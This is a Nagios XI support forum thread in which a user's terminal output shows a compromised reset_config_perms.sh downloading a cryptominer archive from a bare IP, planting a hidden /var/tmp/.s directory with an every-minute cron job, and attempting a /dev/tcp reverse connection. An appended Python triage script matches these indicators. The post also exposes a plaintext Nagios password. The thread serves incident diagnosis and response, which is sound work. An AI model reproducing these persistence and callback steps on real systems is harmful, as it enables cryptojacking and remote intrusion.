Error code: 9.

This support forum board is for support questions relating to Nagios XI, our flagship commercial network monitoring solution.
habuhejleh
Posts: 32
Joined: Thu Feb 08, 2018 3:24 am

Re: Error code: 9.

Post by habuhejleh »

Hi,

Yes, I tried removing reconfigure_nagios.lock and then ran reconfigure_nagios.sh, and I got the output below:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login
--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”

[ <=> ] 35,561 --.-K/s in 0.04s

2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]

LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]#

Please find below outputs you requested:
[root@um-isp-nagios-redline scripts]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_umispnagiosredline-lv_root 8.4G 7.2G 853M 90% /
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda1 485M 39M 421M 9% /boot
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#

I see the errors in the GUI, as shown in the attachment.

And please find attached the output of tailerror 100.

[root@um-isp-nagios-redline ~]# service httpd status
httpd (pid 1782) is running...
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline ~]#

Please advise how to solve all these problems. I would appreciate your prompt response.
lmiltchev
Former Nagios Staff
Posts: 13587
Joined: Mon May 23, 2011 12:15 pm

Re: Error code: 9.

Post by lmiltchev »

RESETTING CONFIG PERMS FAILED!\n
This is strange... Can you execute the "reset_config_perms.sh" script logged in as root? Please run the following commands, and show the output.


cd /usr/local/nagiosxi/scripts/
./reset_config_perms.sh
chage nagios -l
chage apache -l
grep nag /etc/group /etc/passwd
Be sure to check out our Knowledgebase for helpful articles and solutions!
habuhejleh
Posts: 32
Joined: Thu Feb 08, 2018 3:24 am

Re: Error code: 9.

Post by habuhejleh »

Please find the outputs below and advise ASAP:

[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts/
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh
sh: no process killed
--2018-07-19 09:23:59-- http://148.204.64.98/fut.tgz
Connecting to 148.204.64.98:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1573544 (1.5M) [application/x-gzip]
Saving to: “fut.tgz”

100%[======================================>] 1,573,544 932K/s in 1.6s

2018-07-19 09:24:01 (932 KB/s) - “fut.tgz” saved [1573544/1573544]

.s/
.s/h64
.s/upd
.s/x
.s/a
.s/cnrig
.s/run
.s/h32
.s/config.json
.s/.cnrig.cacert.pem
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh: connect: Connection refused
./reset_config_perms.sh: line 1: /dev/tcp/128.14.62.194/5566: Connection refused
[root@um-isp-nagios-redline scripts]#


[root@um-isp-nagios-redline scripts]# chage nagios -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#

[root@um-isp-nagios-redline scripts]# chage apache -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : -1
Maximum number of days between password change : -1
Number of days of warning before password expires : -1
[root@um-isp-nagios-redline scripts]#


[root@um-isp-nagios-redline scripts]# grep nag /etc/group /etc/passwd
/etc/group:root:x:0:nagiosadmin
/etc/group:nagios:x:500:nagios,apache
/etc/group:nagcmd:x:501:nagios,apache
/etc/group:nagiosadmin:x:502:
/etc/passwd:nagios:x:500:500::/home/nagios:/bin/bash
/etc/passwd:nagiosadmin:x:501:502::/home/nagiosadmin:/bin/bash
[root@um-isp-nagios-redline scripts]#
scottwilkerson
DevOps Engineer
Posts: 19396
Joined: Tue Nov 15, 2011 3:11 pm
Location: Nagios Enterprises

Re: Error code: 9.

Post by scottwilkerson »

Please send a copy of the following file off the server:

/usr/local/nagiosxi/scripts/reset_config_perms.sh

It should not be making a connection to http://148.204.64.98/fut.tgz
Former Nagios employee
Creator:
ahumandesign.com
enneagrams.com
habuhejleh
Posts: 32
Joined: Thu Feb 08, 2018 3:24 am

Re: Error code: 9.

Post by habuhejleh »

Here is the file, attached.
Please advise.
scottwilkerson
DevOps Engineer
Posts: 19396
Joined: Tue Nov 15, 2011 3:11 pm
Location: Nagios Enterprises

Re: Error code: 9.

Post by scottwilkerson »

This looks like your machine may have been compromised.

I strongly suggest restoring from a backup from before this started occurring and securing your XI server as best you can.
Former Nagios employee
Creator:
ahumandesign.com
enneagrams.com
tmcdonald
Posts: 9117
Joined: Mon Sep 23, 2013 8:40 am

Re: Error code: 9.

Post by tmcdonald »

Not only that, you should power the machine down as soon as you can. The last command in the compromised file you shared is connecting back to a remote machine giving someone access.
Former Nagios employee
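A small triage helper in the spirit of the advice above, added here as an example and not code from Nagios or from anyone in the thread: it scans a script (or a captured run of it) for the four indicators visible in this thread's reset_config_perms.sh output, namely a payload fetched from a bare-IP URL, a hidden directory under /var/tmp, an every-minute cron entry, and a bash /dev/tcp connection, and lists the remote host:port pairs a responder would block and report. The sample transcript and the 203.0.113.x addresses are constructed, not the thread's real values.

```python
import re

# Indicator patterns modelled on the compromised reset_config_perms.sh run in the thread.
INDICATORS = {
    # wget/curl to a bare IP, or a wget progress line ("--YYYY-MM-DD hh:mm:ss--") for one.
    "download_from_bare_ip": re.compile(
        r"(?:\b(?:wget|curl)\b|^--\d{4}-\d\d-\d\d \d\d:\d\d:\d\d--)"
        r".*https?://\d{1,3}(?:\.\d{1,3}){3}\S*"),
    # A dot-prefixed directory under /tmp or /var/tmp, e.g. /var/tmp/.s/upd.
    "hidden_dir_in_tmp": re.compile(r"/(?:var/)?tmp/\.[A-Za-z0-9_.-]+"),
    # Cron entry firing every minute (five asterisks then a command).
    "every_minute_cron": re.compile(r"^\*( \*){4} \S"),
    # bash's /dev/tcp/<ip>/<port> pseudo-path, i.e. an outbound TCP connection.
    "dev_tcp_connect": re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})"),
}

# Constructed sample in the shape of the thread's output (not the real transcript).
SAMPLE = """\
[root@xi scripts]# ./reset_config_perms.sh
sh: no process killed
--2018-07-19 09:23:59-- http://203.0.113.10/fut.tgz
Saving to: "fut.tgz"
.s/
.s/upd
.s/config.json
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
./reset_config_perms.sh: line 1: /dev/tcp/203.0.113.20/5566: Connection refused
"""

def scan_text(text):
    """Return (line_no, indicator_name, line) for every line matching an indicator."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pat in INDICATORS.items():
            if pat.search(line):
                hits.append((no, name, line.rstrip()))
    return hits

def scan_file(path):
    """Scan a script file (e.g. reset_config_perms.sh) with the same indicators."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())

def remote_endpoints(text):
    """Collect sorted (host, port) pairs the text reaches out to: bare-IP URLs and /dev/tcp paths."""
    found = set()
    for m in re.finditer(r"(https?)://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?", text):
        found.add((m.group(2), int(m.group(3) or (443 if m.group(1) == "https" else 80))))
    for m in INDICATORS["dev_tcp_connect"].finditer(text):
        found.add((m.group(1), int(m.group(2))))
    return sorted(found)

if __name__ == "__main__":
    for no, name, line in scan_text(SAMPLE):
        print(f"line {no}: {name}: {line}")
    print("remote endpoints:", remote_endpoints(SAMPLE))
```

The legitimate wget in the reconfigure output earlier in the thread goes to http://localhost and is therefore not flagged; anything a permission-reset script does over the network is worth a look.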
habuhejleh
Posts: 32
Joined: Thu Feb 08, 2018 3:24 am

Re: Error code: 9.

Post by habuhejleh »

Hi,

Can uninstalling Nagios XI and then installing it again solve this problem and remove the compromise?
Please confirm.
rkennedy
Posts: 6579
Joined: Mon Oct 05, 2015 11:45 am

Re: Error code: 9.

Post by rkennedy »

habuhejleh wrote: Hi,

Can uninstalling Nagios XI and then installing it again solve this problem and remove the compromise?
Please confirm.
This is a better question for your Security team. Uninstalling Nagios XI will remove all Nagios components, but as @tmcdonald mentioned, you're connecting back to a server in LA over a TCP socket. I look at this as your system having been completely compromised, with no idea what else may be on the system at this point.

http://whois.domaintools.com/128.14.62.194
Former Nagios Employee
scottwilkerson
DevOps Engineer
Posts: 19396
Joined: Tue Nov 15, 2011 3:11 pm
Location: Nagios Enterprises

Re: Error code: 9.

Post by scottwilkerson »

You should restart the XI server if you have not already done so.

Then, before doing anything else, replace /usr/local/nagiosxi/scripts/reset_config_perms.sh with the attached file.
reset_config_perms.sh
Finally, I would recommend performing an upgrade immediately to prevent yourself from being targeted again.
https://assets.nagios.com/downloads/nag ... ctions.pdf
Former Nagios employee
Creator:
ahumandesign.com
enneagrams.com